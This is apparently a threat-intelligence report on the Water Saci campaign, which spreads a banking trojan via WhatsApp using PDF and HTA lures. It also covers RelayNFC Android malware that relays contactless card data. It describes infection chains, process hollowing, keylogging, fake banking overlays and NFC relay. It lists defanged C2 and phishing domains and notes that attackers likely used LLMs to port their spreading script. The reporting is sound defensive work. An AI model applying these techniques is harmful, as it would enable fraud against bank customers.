Imagen Principal

The threat actor Water Saci is evolving its tactics, now employing a sophisticated infection chain that uses HTA files and PDFs to propagate a worm. This worm deploys a banking trojan via WhatsApp, targeting users in Brazil.

  • The attackers have shifted from PowerShell to a Python-based variant to spread malware via WhatsApp Web.
  • The new multi-format attack chain uses AI to convert propagation scripts, enabling Water Saci to bypass security controls, exploit user trust, and increase infection rates.
  • Users receive messages on WhatsApp with malicious PDF or HTA attachments, which activate the infection chain and drop a banking trojan.

The infection chain involves:

  1. PDF Lure: Victims are instructed to update Adobe Reader by clicking a link.
  2. HTA Files: Users are tricked into executing a Visual Basic Script, which runs PowerShell commands to fetch payloads from a remote server:
    • An MSI installer for the trojan.
    • A Python script that spreads malware via WhatsApp Web.

The Python script enhances browser compatibility, uses object-oriented code, and improves error handling and automation for malware delivery through WhatsApp Web.

The MSI installer delivers the banking trojan using an AutoIt script, which ensures only one instance of the trojan is running by verifying the existence of an “executed.dat” file. It also notifies a C2 server (“manoelimoveiscaioba[.]com”).

The AutoIt script:

  • Verifies if the Windows system language is set to Portuguese (Brazil).
  • Scans the infected system for banking-related activity, checking for folders related to Brazilian banking applications like Bradesco, Warsaw, Topaz OFD, Sicoob, and Itaú.
  • Analyzes the user’s Google Chrome browsing history for visits to banking websites like Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco.
  • Checks for installed antivirus and security software, harvesting system metadata.
  • Monitors open windows, extracting window titles to compare against a list of targeted entities (banks, payment platforms, exchanges, crypto wallets).

If relevant windows are found, the script decrypts and injects a TDA file into a hollowed “svchost.exe” process. If only a DMP file is found, it loads the banking trojan directly into the AutoIt process memory.

Persistence is achieved by monitoring the “svchost.exe” process and restarting if it’s terminated.

The deployed banking trojan exhibits similarities with Casbaneiro based on:

  • AutoIt-based delivery and loader mechanism.
  • Window title monitoring.
  • Registry-based persistence.
  • IMAP-based fallback command-and-control (C2) mechanism.

Once launched, the trojan:

  • Performs anti-virtualization checks.
  • Gathers host information via WMI queries.
  • Modifies Registry settings for persistence.
  • Communicates with a C2 server (“serverseistemasatu[.]com”) to send details and receive commands.

The trojan’s capabilities include:

  • Sending system information.
  • Enabling keyboard capture.
  • Starting/stopping screen capture.
  • Modifying screen resolution.
  • Simulating mouse movements and clicks.
  • Performing file operations (upload/download).
  • Enumerating windows.
  • Creating fake banking overlays to capture credentials.

The campaign uses a Python script to deliver malware via WhatsApp Web sessions using Selenium. There is evidence suggesting that Water Saci used LLMs or code-translation tools to port the script from PowerShell to Python.

In addition, Brazilian banking users are being targeted by RelayNFC Android malware, which performs NFC relay attacks to steal contactless payment data.

  • RelayNFC implements a full real-time APDU relay channel.
  • The malware is built using React Native and Hermes bytecode.
  • It spreads via phishing, using decoy Portuguese-language sites.
  • The goal is to capture card details and relay them to attackers for fraudulent transactions.
  • It operates by instructing the victim to tap their payment card on the device, then prompts for the PIN.
  • The captured information is sent to the attacker’s server via WebSocket.
  • The malware also implements Host Card Emulation (HCE), allowing card interactions to be transmitted between a terminal and an attacker-controlled device.

Conclusiones

The Water Saci campaign highlights a new era of cyber threats in Brazil, where attackers weaponize messaging platforms like WhatsApp to orchestrate large-scale, self-propagating malware campaigns. They use social engineering to compromise victims and sustain banking trojan infections, demonstrating the growing sophistication of cybercriminal operations in the region. The emergence of RelayNFC Android malware further underscores the evolving threat landscape targeting payment systems in Brazil.

Referencias

  • C2 server: manoelimoveiscaioba[.]com
  • C2 server: serverseistemasatu[.]com
  • Phishing site (RelayNFC): maisseguraca[.]site
  • Phishing site (RelayNFC): test.ikotech[.]online